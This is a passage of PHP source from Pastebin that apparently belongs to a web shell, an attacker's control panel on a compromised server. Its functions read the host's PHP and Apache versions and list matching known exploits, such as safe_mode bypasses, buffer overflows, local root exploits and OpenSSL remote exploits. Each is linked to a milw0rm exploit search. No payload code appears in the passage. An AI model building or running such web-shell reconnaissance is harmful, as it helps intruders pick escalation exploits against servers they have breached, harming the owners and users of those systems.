  1315.                     "PHP Perl Extension Safe_mode Bypass Exploit",
  1316.                     "PHP 5.x COM functions safe_mode and disable_function bypass",
  1317.                     "PHP 4.4.5 / 4.4.6 session_decode() Double Free Exploit PoC",
  1318.                     "PHP < 4.4.5 / 5.2.1 _SESSION unset() Local Exploit",
  1319.                     "PHP < 4.4.5 / 5.2.1 _SESSION Deserialization Overwrite Exploit",
  1320.                     "PHP < 4.4.5 / 5.2.1 WDDX Session Deserialization Information Leak",
  1321.                     "PHP < 4.4.5 / 5.2.1 php_binary Session Deserialization Information Leak",
  1322.                     "PHP 4.4.3 - 4.4.6 phpinfo() Remote XSS Vulnerability",
  1323.                     "PHP < 4.4.5 / 5.2.1 (shmop) SSL RSA Private-Key Disclosure Exploit",
  1324.                     "PHP < 4.4.5 / 5.2.1 (shmop Functions) Local Code Execution Exploit"
  1325.                 );
  1326.         $version["4.4.4"] = array(
  1327.                     "PHP (php-exec-dir) Patch Command Access Restriction Bypass",
  1328.                     "PHP wddx_deserialize() String Append Crash Exploit",
  1329.                     "PHP COM extensions (inconsistent Win32) safe_mode Bypass Exploit",
  1330.                     "PHP php_gd2.dll imagepsloadfont Local Buffer Overflow PoC",
  1331.                     "PHP 5.x (win32service) Local Safe Mode Bypass Exploit",
  1332.                     "PHP mSQL (msql_connect) Local Buffer Overflow PoC", "PHP mSQL (msql_connect) Local Buffer Overflow Exploit",
  1333.                     "PHP FFI Extension 5.0.5 Local Safe_mode Bypass Exploit", "PHP Perl Extension Safe_mode Bypass Exploit",
  1334.                     "PHP 5.x COM functions safe_mode and disable_function bypass", "PHP <= 4.4.4 / 5.1.6 htmlentities() Local Buffer Overflow PoC",
  1335.                     "PHP <= 4.4.4 unserialize() ZVAL Reference Counter Overflow Exploit PoC",
  1336.                     "PHP 4.4.3 - 4.4.6 phpinfo() Remote XSS Vulnerability");
  1337.         $version["4.4.3"] = array(
  1338.                     "PHP (php-exec-dir) Patch Command Access Restriction Bypass",
  1339.                     "PHP wddx_deserialize() String Append Crash Exploit",
  1340.                     "PHP COM extensions (inconsistent Win32) safe_mode Bypass Exploit",
  1341.                     "PHP php_gd2.dll imagepsloadfont Local Buffer Overflow PoC",
  1342.                     "PHP 5.x (win32service) Local Safe Mode Bypass Exploit",
  1343.                     "PHP mSQL (msql_connect) Local Buffer Overflow PoC",
  1344.                     "PHP mSQL (msql_connect) Local Buffer Overflow Exploit",
  1345.                     "PHP FFI Extension 5.0.5 Local Safe_mode Bypass Exploit",
  1346.                     "PHP Perl Extension Safe_mode Bypass Exploit",
  1347.                     "PHP 5.x COM functions safe_mode and disable_function bypass",
  1348.                     "PHP <= 4.4.3 / 5.1.4 (objIndex) Local Buffer Overflow Exploit PoC",
  1349.                     "PHP <= 4.4.3 / 5.1.4 (sscanf) Local Buffer Overflow Exploit",
  1350.                     "PHP 4.4.3 - 4.4.6 phpinfo() Remote XSS Vulnerability"
  1351.                 );
  1352.         $version["4.4.0"] = array(
  1353.                     "PHP (php-exec-dir) Patch Command Access Restriction Bypass",
  1354.                     "PHP wddx_deserialize() String Append Crash Exploit",
  1355.                     "PHP COM extensions (inconsistent Win32) safe_mode Bypass Exploit",
  1356.                     "PHP php_gd2.dll imagepsloadfont Local Buffer Overflow PoC",
  1357.                     "PHP 5.x (win32service) Local Safe Mode Bypass Exploit",
  1358.                     "PHP mSQL (msql_connect) Local Buffer Overflow PoC",
  1359.                     "PHP mSQL (msql_connect) Local Buffer Overflow Exploit",
  1360.                     "PHP FFI Extension 5.0.5 Local Safe_mode Bypass Exploit",
  1361.                     "PHP Perl Extension Safe_mode Bypass Exploit",
  1362.                     "PHP 5.x COM functions safe_mode and disable_function bypass",
  1363.                     "PHP <= 4.4.0 (mysql_connect function) Local Buffer Overflow Exploit"
  1364.                 );
  1365.         $version["4.3.7"] = array(
  1366.                     "PHP (php-exec-dir) Patch Command Access Restriction Bypass",
  1367.                     "PHP wddx_deserialize() String Append Crash Exploit",
  1368.                     "PHP COM extensions (inconsistent Win32) safe_mode Bypass Exploit",
  1369.                     "PHP php_gd2.dll imagepsloadfont Local Buffer Overflow PoC",
  1370.                     "PHP 5.x (win32service) Local Safe Mode Bypass Exploit",
  1371.                     "PHP mSQL (msql_connect) Local Buffer Overflow PoC",
  1372.                     "PHP mSQL (msql_connect) Local Buffer Overflow Exploit",
  1373.                     "PHP FFI Extension 5.0.5 Local Safe_mode Bypass Exploit",
  1374.                     "PHP Perl Extension Safe_mode Bypass Exploit",
  1375.                     "PHP 5.x COM functions safe_mode and disable_function bypass",
  1376.                     "PHP <= 4.3.7 / 5.0.0RC3 memory_limit Remote Exploit",
  1377.                     "PHP <= 4.3.7 openlog() Buffer Overflow Exploit"
  1378.                 );
  1379.         $version["3.0.16"] = array(
  1380.                     "PHP (php-exec-dir) Patch Command Access Restriction Bypass",
  1381.                     "PHP wddx_deserialize() String Append Crash Exploit",
  1382.                     "PHP COM extensions (inconsistent Win32) safe_mode Bypass Exploit",
  1383.                     "PHP php_gd2.dll imagepsloadfont Local Buffer Overflow PoC",
  1384.                     "PHP 5.x (win32service) Local Safe Mode Bypass Exploit",
  1385.                     "PHP mSQL (msql_connect) Local Buffer Overflow PoC",
  1386.                     "PHP mSQL (msql_connect) Local Buffer Overflow Exploit",
  1387.                     "PHP FFI Extension 5.0.5 Local Safe_mode Bypass Exploit",
  1388.                     "PHP Perl Extension Safe_mode Bypass Exploit",
  1389.                     "PHP 5.x COM functions safe_mode and disable_function bypass",
  1390.                     "PHP 3.0.16 / 4.0.2 Remote Format Overflow Exploit"
  1391.                 );
  1392.  
  1393.         if(isset($version[$ver]))
  1394.             foreach($version[$ver] as $vuln)
  1395.                 $result .= "<a href=\"http://milw0rm.com/search.php?dong=" .$vuln. "\" target=\"_blank\">" .$vuln. "</a><br />\n";
  1396.         else
  1397.             $result .= "There is no information in the shell database about this php version.<br />";
  1398.         $result .= "<br />";
  1399.         return $result;
  1400.     }
  1401.  
  1402.     function ViewApacheBugs(){
  1403.         $starttext = "<span class=\"PageTitle\">View Apache Bugs</span><br /><br />";
  1404.         $result = $starttext;
  1405.         $ver = @apache_get_version();
  1406.  
  1407.         $version["2.2.3"] = array(
  1408.                     "Apache HTTPd Arbitrary Long HTTP Headers DoS",
  1409.                     "Apache HTTP Server 2.x Memory Leak Exploit",
  1410.                     "Apache OpenSSL Remote Exploit (Multiple Targets) (OpenFuckV2.c)"
  1411.                 );
  1412.         $version["2.0.59"] = array(
  1413.                     "Apache HTTPd Arbitrary Long HTTP Headers DoS",
  1414.                     "Apache HTTP Server 2.x Memory Leak Exploit",
  1415.                     "Apache OpenSSL Remote Exploit (Multiple Targets) (OpenFuckV2.c)",
  1416.                     "Apache < 1.3.37, 2.0.59, 2.2.3 (mod_rewrite) Remote Overflow PoC"
  1417.                 );
  1418.         $version["2.0.58"] = array(
  1419.                     "Apache HTTPd Arbitrary Long HTTP Headers DoS",
  1420.                     "Apache HTTP Server 2.x Memory Leak Exploit",
  1421.                     "Apache OpenSSL Remote Exploit (Multiple Targets) (OpenFuckV2.c)",
  1422.                     "Apache 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3)"
  1423.                 );
  1424.         $version["2.0.52"] = array(
  1425.                     "Apache <= 2.0.52 HTTP GET request Denial of Service Exploit",
  1426.                     "Apache 2.0.52 Multiple Space Header Denial of Service Exploit (v2)",
  1427.                     "Apache 2.0.52 Multiple Space Header DoS (Perl code)",
  1428.                     "Apache 2.0.52 Multiple Space Header DoS (c code)"
  1429.                 );
  1430.         $version["2.0.48"] = array(
  1431.                     "Apache HTTPd Arbitrary Long HTTP Headers DoS",
  1432.                     "Apache 1.3.*-2.0.48 mod_userdir Remote Users Disclosure Exploit"
  1433.                 );
  1434.         $version["2.0.45"] = array(
  1435.                     "Apache HTTPd Arbitrary Long HTTP Headers DoS",
  1436.                     "Apache HTTP Server 2.x Memory Leak Exploit",
  1437.                     "Apache OpenSSL Remote Exploit (Multiple Targets) (OpenFuckV2.c)",
  1438.                     "Apache <= 2.0.45 APR Remote Exploit -Apache-Knacker.pl"
  1439.                 );
  1440.         $version["2.0.44"] = array(
  1441.                     "Apache HTTPd Arbitrary Long HTTP Headers DoS",
  1442.                     "Apache HTTP Server 2.x Memory Leak Exploit",
  1443.                     "Apache OpenSSL Remote Exploit (Multiple Targets) (OpenFuckV2.c)",
  1444.                     "Apache <= 2.0.44 Linux Remote Denial of Service Exploit"
  1445.                 );
  1446.         $version["1.3.37"] = array(
  1447.                     "Apache HTTPd Arbitrary Long HTTP Headers DoS",
  1448.                     "Apache 1.3.*-2.0.48 mod_userdir Remote Users Disclosure Exploit",
  1449.                     "Apache 1.3.x mod_mylo Remote Code Execution Exploit",
  1450.                     "Apache OpenSSL Remote Exploit (Multiple Targets) (OpenFuckV2.c)",
  1451.                     "Apache < 1.3.37, 2.0.59, 2.2.3 (mod_rewrite) Remote Overflow PoC"
  1452.                 );
  1453.         $version["1.3.34"] = array(
  1454.                     "Ubuntu/Debian Apache 1.3.33/1.3.34 (CGI TTY) Local Root Exploit"
  1455.                 );
  1456.         $version["1.3.33"] = array(
  1457.                     "Ubuntu/Debian Apache 1.3.33/1.3.34 (CGI TTY) Local Root Exploit"
  1458.                 );
  1459.         $version["1.3.31"] = array(
  1460.                     "Apache HTTPd Arbitrary Long HTTP Headers DoS",
  1461.                     "Apache 1.3.*-2.0.48 mod_userdir Remote Users Disclosure Exploit",
  1462.                     "Apache 1.3.x mod_mylo Remote Code Execution Exploit",
  1463.                     "Apache OpenSSL Remote Exploit (Multiple Targets) (OpenFuckV2.c)",
  1464.                     "Apache <= 1.3.31 mod_include Local Buffer Overflow Exploit"
  1465.                 );
  1466.  
  1467.         foreach($version as $vuln_version => $vulns)
  1468.             if(strstr($ver, $vuln_version))
  1469.                 foreach($vulns as $vuln)
  1470.                     $result.= "<a href=\"http://milw0rm.com/search.php?dong=" .$vuln. "\">" .$vuln. "</a><br />\n";
  1471.  
  1472.         if($result == $starttext)
  1473.             $result .= "There is no information in the shell database about this apache version.<br />";
  1474.  
  1475.         $result .= "<br />";
  1476.         return $result;
  1477.     }
  1478.  
  1479. }
  1480.  
  1481. function GenerateColors($value){
  1482.     if(strlen($value) <= 0){ //No Value?
  1483.         $value = "<em style=\"color:gray;\">no value</em>\n";
  1484.     }
  1485.     else{
  1486.         if($value == "1"){ //Enabled?
  1487.             $value = "<span style=\"color:green;\">enabled</span>\n";
  1488.         }
  1489.         else if($value == "0"){ //Disabled?
  1490.             $value = "<span style=\"color:red;\">disabled</span>\n";
  1491.         }
  1492.         else if($value == "-1"){ //Unlimited?
  1493.             $value = "<span style=\"color:orange;\">unlimited</span>\n";
  1494.         }
  1495.     }
  1496.  
  1497.     //Colors in value?
  1498.     $value = preg_replace("/(#.+)(\S)/i","<span style=\"color:\\1\\2;\">\\1\\2</span>\n",$value);
  1499.  
  1500.     //& => &amp; (Valid XHTML)
  1501.     $value = str_replace("&","&amp;",$value);
  1502.  
  1503.     return $value;
  1504. }
  1505. ?>
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!